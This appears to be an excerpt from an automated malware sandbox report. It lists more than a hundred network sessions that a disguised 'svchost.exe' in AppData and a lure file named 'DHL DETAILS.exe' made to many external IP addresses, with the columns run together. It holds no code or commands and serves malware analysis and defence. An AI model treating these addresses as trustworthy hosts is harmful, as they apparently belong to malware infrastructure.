                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5098192.168.2.549515104.19.225.708043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5099192.168.2.549516172.67.181.1368043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5100192.168.2.549539104.20.233.708043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5101192.168.2.54954945.12.31.38043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5102192.168.2.549553185.162.230.2018043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5103192.168.2.54928235.199.90.225888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5104192.168.2.549560104.22.1.1138043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5105192.168.2.549565104.18.220.958043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5106192.168.2.54945991.107.180.2508056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5107192.168.2.54946651.75.125.2082702956176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5108192.168.2.54947434.95.243.122808143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5109192.168.2.54950252.13.248.29312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5110192.168.2.549308158.220.91.231312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5111192.168.2.549245192.111.137.35414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5112192.168.2.549284117.54.114.988056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5113192.168.2.549461171.244.140.1601752556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5114192.168.2.54947518.135.133.1168043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5115192.168.2.54954445.62.235.188043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5116192.168.2.549955103.133.222.1704436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5117192.168.2.549960103.133.222.1704436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5118192.168.2.549975103.133.222.1704436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5119192.168.2.549989103.133.222.1704436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5120192.168.2.55002249.51.93.2224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5121192.168.2.55003349.51.93.2224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5122192.168.2.549600142.4.123.418043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5123192.168.2.55005349.51.93.2224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5124192.168.2.55007549.51.93.2224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5125192.168.2.549569187.49.191.1499943080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5126192.168.2.564758161.97.147.1934313143080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5127192.168.2.549633104.25.115.1258043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5128192.168.2.54951252.196.1.1828043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5129192.168.2.549328162.241.53.725569356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5130192.168.2.549647104.27.122.68056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5131192.168.2.549640162.159.242.108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5132192.168.2.54965074.48.7.438056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5133192.168.2.549673172.67.182.1508043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5134192.168.2.54957218.169.83.87108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5135192.168.2.54950451.89.173.40310043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5136192.168.2.5494885.135.83.2148043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5137192.168.2.549627107.181.161.81414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5138192.168.2.549684104.18.136.288056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5139192.168.2.549698104.24.136.688043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5140192.168.2.54963152.73.224.54312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5141192.168.2.54955445.120.178.197108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5142192.168.2.549337192.163.202.881018556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5143192.168.2.549779104.20.75.31806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5144192.168.2.549783104.27.37.131806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5145192.168.2.549804104.20.51.99806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5146192.168.2.549785185.162.228.128806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5147192.168.2.549552103.23.100.1414543080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5148192.168.2.5496493.21.101.158312856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5149192.168.2.549571134.209.189.428043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5150192.168.2.549793162.159.242.159806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5151192.168.2.549526190.128.228.1828043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5152192.168.2.54957951.75.126.1503563243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5153192.168.2.549877185.162.229.127806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5154192.168.2.549609119.196.168.1838043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5155192.168.2.5493475.189.163.2108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5156192.168.2.54958331.148.207.1538043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5157192.168.2.549954104.19.171.188806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5158192.168.2.550172172.67.36.21806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5159192.168.2.54959691.241.217.58909043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5160192.168.2.5493698.222.175.2105055456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5161192.168.2.54948390.188.250.168043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5162192.168.2.549619189.85.82.38312843080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5163192.168.2.550088185.238.228.240806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5164192.168.2.55031436.94.2.1384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5165192.168.2.549993216.215.125.178483246352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5166192.168.2.55035736.94.2.1384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5167192.168.2.549646136.244.99.51888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5168192.168.2.563460162.223.94.1648056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5169192.168.2.550222104.25.184.189806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5170192.168.2.55035936.94.2.1384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5171192.168.2.55036036.94.2.1384436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5172192.168.2.54974120.210.113.32806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5173192.168.2.550122162.240.231.211411666352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5174192.168.2.549376138.36.150.16108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5175192.168.2.549867198.199.86.1180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5176192.168.2.54964214.103.24.20800056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5177192.168.2.54963743.128.146.421567356176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5178192.168.2.5495745.44.42.1155838656176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5179192.168.2.55021635.185.196.3831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5180192.168.2.5497153.122.84.9931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5181192.168.2.55006245.196.150.19554326352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5182192.168.2.550158138.197.92.11045276352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5183192.168.2.549357167.86.69.1424221443080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5184192.168.2.550236157.185.157.151265896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5185192.168.2.56342472.49.49.113103456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5186192.168.2.55024094.131.63.4431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5187192.168.2.549659203.89.8.1078056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5188192.168.2.550229172.245.159.177806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5189192.168.2.549577124.163.236.54730243080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5190192.168.2.550009195.154.172.16131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5191192.168.2.54983647.122.45.22131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192192.168.2.549693103.121.39.158108043080C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5193192.168.2.550323104.18.234.218806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5194192.168.2.549825202.150.1.87806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5195192.168.2.55016813.37.59.9931286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5196192.168.2.55012994.23.220.136358056352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5197192.168.2.550343172.67.182.165806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5198192.168.2.550346104.19.247.62806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5199192.168.2.549806103.231.78.36806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5200192.168.2.550202123.126.158.50806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5201192.168.2.550133194.34.232.107806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5202192.168.2.55023846.17.63.166163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5203192.168.2.550164211.222.252.18781936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5204192.168.2.5505778.219.135.234436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5205192.168.2.5505928.219.135.234436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5206192.168.2.5505968.219.135.234436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5207192.168.2.5505988.219.135.234436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5208192.168.2.550089171.250.222.1310806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5209192.168.2.550249130.162.213.17580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5210192.168.2.550131182.52.229.16580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5211192.168.2.55037774.48.7.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5212192.168.2.550385185.162.229.112806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5213192.168.2.550242111.90.150.10910806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5214192.168.2.549885172.232.111.247806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5215192.168.2.550254123.30.154.17177776352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5216192.168.2.550421185.162.231.254806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5217192.168.2.550442107.180.103.214458706352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5218192.168.2.55084493.190.24.1194436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5219192.168.2.550393107.181.161.8141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5220192.168.2.550532104.21.80.83806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5221192.168.2.550354218.252.244.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5222192.168.2.55085693.190.24.1194436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5223192.168.2.55085893.190.24.1194436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5224192.168.2.55085993.190.24.1194436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5225192.168.2.55037120.111.54.16806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5226192.168.2.55037616.162.211.9010806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5227192.168.2.55090943.157.44.794436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5228192.168.2.55091243.157.44.794436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5229192.168.2.55091943.157.44.794436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5230192.168.2.55092643.157.44.794436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5231192.168.2.564891176.241.143.197808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5232192.168.2.55094643.157.50.2064436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5233192.168.2.55094943.157.50.2064436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5234192.168.2.5494185.10.249.159108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5235192.168.2.55095043.157.50.2064436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5236192.168.2.550372194.247.173.1780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5237192.168.2.55095243.157.50.2064436352C:\Users\user\Desktop\DHL DETAILS.exe
